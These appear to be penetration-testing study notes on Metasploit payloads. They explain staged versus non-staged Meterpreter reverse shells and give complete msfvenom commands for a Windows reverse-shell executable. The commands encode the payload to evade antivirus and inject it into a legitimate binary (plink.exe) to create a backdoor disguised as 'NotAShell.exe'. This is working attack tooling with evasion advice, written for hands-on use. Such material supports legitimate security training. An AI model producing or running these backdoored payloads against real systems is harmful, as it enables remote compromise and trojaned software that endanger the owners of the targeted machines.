Payloads

Staged vs. Non-staged Payloads

Try staged payloads first, but don't forget to try non-staged payloads if staged payloads don't work.

A non-staged payload is sent in its entirety along with the exploit. For example:

windows/x64/meterpreter_reverse_tcp

In contrast, a staged payload is usually sent in two parts. The first part contains a small primary payload that causes the victim machine to connect back to the attacker, transfer a larger secondary payload containing the rest of the shellcode, and then execute it. For example:

windows/x64/meterpreter/reverse_tcp

Use staged payloads when:

1. The vulnerability we are exploiting does not have enough buffer space to hold a full payload.

2. Antivirus software blocks the non-staged payload.

Executable Payloads

Generate a raw Windows PE reverse shell executable with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -o NotAShell.exe

Improve the above payload by encoding it for 9 iterations:

msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -o NotAShell.exe

Further improve the above payload by injecting the payload into an existing PE file (it means creating a backdoor):

msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o NotAShell.exe

This payload generation process can be accomplished within msfconsole with the generate command:

generate